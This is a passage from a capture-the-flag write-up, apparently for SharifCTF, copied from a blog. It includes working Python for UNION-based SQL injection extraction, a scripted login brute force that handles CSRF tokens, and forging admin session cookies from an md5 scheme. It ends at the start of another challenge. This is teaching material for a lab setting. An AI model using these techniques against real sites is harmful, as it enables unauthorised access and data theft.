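def extract(page, ncols, pos, expr):
    """Read one scalar expression through the reflected column, delimited by the
    markers so it can be cut out of the surrounding HTML (CONCAT in MySQL, || here)."""
    cells = ["NULL"] * ncols
    cells[pos] = "'%s'||(%s)||'%s'" % (MARK_L, expr, MARK_R)
    html = page("-1 UNION ALL SELECT %s-- " % ",".join(cells))
    m = re.search(re.escape(MARK_L) + "(.*?)" + re.escape(MARK_R), html, re.S)
    return m.group(1) if m else None


if __name__ == "__main__":
    db = make_wp_db()
    page = lambda payload: event_edit_page(db, payload)
    ncols = find_column_count(page)
    pos = find_reflected_column(page, ncols)
    print("columns:", ncols, "reflected position:", pos + 1)
    print(extract(page, ncols, pos, "SELECT group_concat(name) FROM sqlite_master WHERE type='table'"))
    print(extract(page, ncols, pos, "SELECT post_content FROM wp_posts WHERE post_content LIKE 'Flag is %'"))
```

    The `-1` in front of the UNION selects no real event, so the rendered row is entirely attacker-controlled; sqlmap's `-7860` in the log serves the same purpose. Against the real target the `page` callable would be a requests.get with the WordPress cookies from the sqlmap command above.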

    Photoshare

    Photoshare is an internet based photo sharing service. Login to this website as admin.
    web: ctf.sharif.edu:8084
    Alternative Link
    username: jack
    password: Year and month of Jack's birthday.
    Hint:No need for XSS or bypassing the uploader.

    • Per the hint the username is jack and the password is the year and month of his birthday (YYYYMM, six digits). The login form also carries an arithmetic check (SecQuestion) and a CSRF token, so the brute force has to be scripted. The fields the form submits, from the page source:
    <div class = "container">  
    <div class="wrapper"> 
    <form action="/signin" method="post" name="Login_Form" class="form-signin">  
    <h3 class="form-signin-heading">Welcome Back! Please Sign In</h3>  
    <hr class="colorgraph">
    <br>  
    <input type="text" class="form-control" name="Username" placeholder="Username" required="" autofocus="" />  
    <input type="password" class="form-control" name="Password" placeholder="Password" required=""/>  
    <input type="text" class="form-control" name="SecQuestion" placeholder="15 - 15 = " required="" autofocus="" />  
    <input type="hidden" name="field" value="cfcd208495d565ef66e7dff9f98764da">  
    <input type="hidden" name="_token" value="mB05LJVYxsH5EJVgLQOLBmQOJcTeorbPFYhvoWec">  
    <button class="btn btn-lg btn-primary btn-block"  name="Submit" value="Login" type="Submit">Login</button>  
    </form>  </div>  </div>
    
    
    import re
    import requests
    
    # Password generator: every year/month as YYYYMM, 190001 .. 201812
    def gen_passwords():
        for year in range(1900, 2019):
            for month in range(1, 13):
                yield '%04d%02d' % (year, month)
    
    # Solve the arithmetic SecQuestion (e.g. "15 - 15 = ") without eval() on server-supplied text
    def solve_question(text):
        m = re.match(r'\s*(\d+)\s*([-+x*])\s*(\d+)\s*=', text)
        if not m:
            raise ValueError('unexpected SecQuestion: %r' % text)
        a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
        if op == '+':
            return a + b
        if op == '-':
            return a - b
        return a * b  # 'x' or '*'
    
    s = requests.Session()
    loginurl = 'http://8084.ctf.certcc.ir/login'
    # Check the network tab: the form posts to /signin, not to /login
    posturl = 'http://8084.ctf.certcc.ir/signin'
    source = s.get(loginurl).text
    
    # Pull the per-session form fields out of the page source
    SecQuestion = re.search(r'name="SecQuestion" placeholder="(.*?)"', source).group(1)
    answer = solve_question(SecQuestion)
    field = re.search(r'name="field" value="(.*?)"', source).group(1)
    token = re.search(r'name="_token" value="(\w+)"', source).group(1)
    
    found = None
    for pw in gen_passwords():
        data = {
            'Username': 'jack',
            'Password': pw,
            'SecQuestion': answer,
            'field': field,
            '_token': token,
            'Submit': 'Login',
        }
        result = s.post(url=posturl, data=data)
        print(pw)
        # A failed login re-renders the sign-in page; anything else means we are in
        if 'Welcome Back' not in result.text:
            found = pw
            break
    print('password:', found)
    
    • password:195408



    • Hint:No need for XSS or bypassing the uploader.
    • The page source shows where the pictures are served from, with the username as part of the URL:
    <div class="col-md-6">  
    <img width="200" height="200" src="http://8084.ctf.certcc.ir/GetPicture/jack/1"/>  <b>dfas</b>  </div>  <div class="col-md-6">  
    <img width="200" height="200" src="http://8084.ctf.certcc.ir/GetPicture/jack/2"/>  <b>sdfasdfasdf</b>  </div>  <div class="col-md-6">  
    <img width="200" height="200" src="http://8084.ctf.certcc.ir/GetPicture/jack/3"/>  <b>red</b>  </div>  <div class="col-md-6">  
    <img width="200" height="200" src="http://8084.ctf.certcc.ir/GetPicture/jack/4"/>  <b>xD</b>  </div>  <div class="col-md-6" style="padding-bottom: 20px;">  
    <img width="200" height="200" src="http://8084.ctf.certcc.ir/GetPicture/jack/5"/>  <b>r&#039;#&#039;//</b>  </div>  <div class="col-md-6" style="padding-bottom: 20px;">  
    <img width="200" height="200" src="http://8084.ctf.certcc.ir/GetPicture/jack/6"/>
    
    
    • Replacing jack with admin in that URL is rejected:
    Error 403! Permission Denied.
    
    • The session cookie turns out to be predictable: session_id = md5("jack18"), i.e. the MD5 of the username followed by 18.


    • So use the Modify Headers extension to present session_id = md5("admin18"). Adding a session_id header did nothing at first; it is the Cookie header that has to be rewritten, with the value session_id=<md5 hash>:


    • After refreshing, the page asks for the SecQuestion:


    • Check admin's pictures for any information:
      http://8084.ctf.certcc.ir/GetPicture/admin/3

    • Logged in as admin:


    • SharifCTF{kmvfwmj6sea7get9wggu249ehjc8hmdd}
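    The cookie weakness above, as an added example (my code, not the challenge's): assuming, as the write-up reports, that session_id is md5(username + "18"), any user's id can be computed without logging in, a captured id can be matched back to a user from a short candidate list (which is exactly the check that confirms the scheme), and a random id, which is what the site should have issued, matches nothing. fetch_as sends a request with the forged cookie; the URL and the 18 suffix are taken from the write-up, nothing else about the site is assumed.

```python
import hashlib
import secrets

# Assumption taken from the write-up: session_id = md5(username + "18").
SESSION_SUFFIX = "18"


def forge_session_id(username):
    """Compute the cookie the site would hand to this user, no login needed."""
    return hashlib.md5((username + SESSION_SUFFIX).encode()).hexdigest()


def recover_user(session_id, candidate_users):
    """Match a captured session_id back to a username by recomputing the scheme.
    If the cookie you were issued as jack equals md5('jack18'), the id carries no secret."""
    for user in candidate_users:
        if forge_session_id(user) == session_id:
            return user
    return None


def random_session_id():
    """What a session id should look like: 128 random bits unrelated to the user."""
    return secrets.token_hex(16)


def fetch_as(username, url):
    """GET url carrying the forged cookie and return the HTTP status code.
    (With jack's own cookie the write-up got 403 on /GetPicture/admin/...)"""
    import requests  # imported here so the offline functions above need no network deps
    s = requests.Session()
    s.cookies.set("session_id", forge_session_id(username))
    return s.get(url).status_code


if __name__ == "__main__":
    jack_cookie = forge_session_id("jack")
    print("jack's cookie  :", jack_cookie)
    print("matches user   :", recover_user(jack_cookie, ["admin", "jack", "organizer"]))
    print("admin's cookie :", forge_session_id("admin"))
    print("random id match:", recover_user(random_session_id(), ["admin", "jack"]))
    # fetch_as("admin", "http://8084.ctf.certcc.ir/GetPicture/admin/3")  # live target only
```

    recover_user is the defender's test as much as the attacker's: run it against a cookie you were issued, and if it returns your username the session scheme is an unkeyed hash of guessable input rather than a random token.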


    Best SMS

    We used "Best SMS" API to send flag to some of our colleagues. :
    web
    Alternative Link
    username: demo
    password: demo
    Hint: E-mail Field.

      Source: https://www.haomeiwen.com/subject/mksozxtx.html